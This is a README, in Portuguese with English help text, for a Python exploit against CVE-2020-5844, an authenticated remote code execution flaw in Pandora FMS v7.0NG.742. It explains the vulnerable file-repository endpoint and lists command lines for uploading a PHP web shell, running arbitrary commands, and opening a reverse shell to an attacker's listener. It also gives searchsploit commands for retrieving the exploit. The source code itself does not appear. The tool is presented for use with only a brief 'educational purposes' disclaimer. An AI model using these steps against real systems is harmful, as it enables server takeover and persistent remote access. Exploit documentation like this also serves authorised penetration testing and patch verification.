
Exploit para CVE-2020-5844 (Pandora FMS v7.0NG.742) - Execução Remota de Código

Gostou deste repositório? Dê-nos uma ⭐!
Apenas para fins educacionais e de pesquisa de segurança autorizada.
@UNICORDev por (@NicPWNs e @Dev-Yeoj)
index.php?sec=godmode/extensions&sec2=extensions/files_repo no Pandora FMS v7.0 NG permite que administradores autenticados carreguem scripts PHP maliciosos e os executem por meio de decodificação base64 da localização do arquivo. Isso afeta v7.0NG.742_FIX_PERL2020.
Use este exploit para execução remota de código em versões vulneráveis do Pandora FMS. Requer endereço IP e porta do alvo. Requer nome de usuário/senha válidos ou autenticação válida via cookie PHPSESSID. Execute no modo padrão para carregar um web shell PHP básico. Execute no modo de comando personalizado para executar um comando personalizado no alvo. Execute no modo de shell reverso para receber um shell reverso do alvo em um listener que você configurou. Execute no modo personalizado de web shell para alterar o nome do arquivo do web shell PHP.
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




